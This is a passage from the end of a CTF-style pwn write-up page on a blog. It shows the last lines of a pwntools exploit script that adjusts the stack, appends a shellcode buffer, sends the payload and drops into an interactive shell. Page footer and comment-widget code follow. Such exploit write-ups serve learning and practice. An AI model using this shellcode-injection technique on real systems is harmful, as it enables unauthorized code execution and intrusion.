</span></span><span class=line><span class=cl><span class=c1># we need to make space on stack for decoding?</span>
</span></span><span class=line><span class=cl><span class=n>payload</span> <span class=o>+=</span> <span class=n>asm</span><span class=p>(</span><span class=s2>&#34;sub rsp, 0x40&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>payload</span> <span class=o>+=</span> <span class=n>buf</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=n>payload</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1>#pause()</span>
</span></span><span class=line><span class=cl><span class=n>opt</span><span class=p>(</span><span class=mi>4</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>interactive</span><span class=p>()</span>
</span></span></code></pre></div></div></article><hr style=margin-top:40px;margin-bottom:40px><div id=disqus_thread></div><script>window.disqus_config=function(){},function(){if(["localhost","127.0.0.1"].indexOf(window.location.hostname)!=-1){document.getElementById("disqus_thread").innerHTML="Disqus comments not available by default when the website is previewed locally.";return}var t=document,e=t.createElement("script");e.async=!0,e.src="//caprinux.disqus.com/embed.js",e.setAttribute("data-timestamp",+new Date),(t.head||t.body).appendChild(e)}()</script><noscript>Please enable JavaScript to view the <a href=https://disqus.com/?ref_noscript>comments powered by Disqus.</a></noscript><a href=https://disqus.com class=dsq-brlink>comments powered by <span class=logo-disqus>Disqus</span></a></main></div><footer class=footer><span class=footer_item></span>&nbsp;<div class=footer_social-icons><a href=https://github.com/caprinux target=_blank rel="noopener noreferrer me" title=Github><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37.0 00-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44.0 0020 4.77 5.07 5.07.0 0019.91 1S18.73.65 16 2.48a13.38 13.38.0 00-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07.0 005 4.77 5.44 5.44.0 003.5 8.55c0 5.42 3.3 6.61 6.44 7A3.37 3.37.0 009 18.13V22"/></svg>
</a><a href=https://x.com/elma_ios target=_blank rel="noopener noreferrer me" title=Twitter><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M23 3a10.9 10.9.0 01-3.14 1.53 4.48 4.48.0 00-7.86 3v1A10.66 10.66.0 013 4s-4 9 5 13a11.64 11.64.0 01-7 2c9 5 20 0 20-11.5a4.5 4.5.0 00-.08-.83A7.72 7.72.0 0023 3z"/></svg>
</a><a href=index.xml target=_blank rel="noopener noreferrer me" title=Rss><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M4 11a9 9 0 019 9"/><path d="M4 4a16 16 0 0116 16"/><circle cx="5" cy="19" r="1"/></svg></a></div><small class=footer_copyright>© 2024 elma.
Powered by <a href=https://github.com/hugo-sid/hugo-blog-awesome target=_blank rel=noopener>Hugo blog awesome</a>.</small></footer><a href=# title="Go to top" id=totop><svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentcolor" stroke="currentcolor" viewBox="0 96 960 960"><path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197z"/></svg>
</a><script src=https://blog.caprinux.com/js/main.min.35f435a5d8eac613c52daa28d8af544a4512337d3e95236e4a4978417b8dcb2f.js integrity="sha256-NfQ1pdjqxhPFLaoo2K9USkUSM30+lSNuSkl4QXuNyy8="></script></body></html>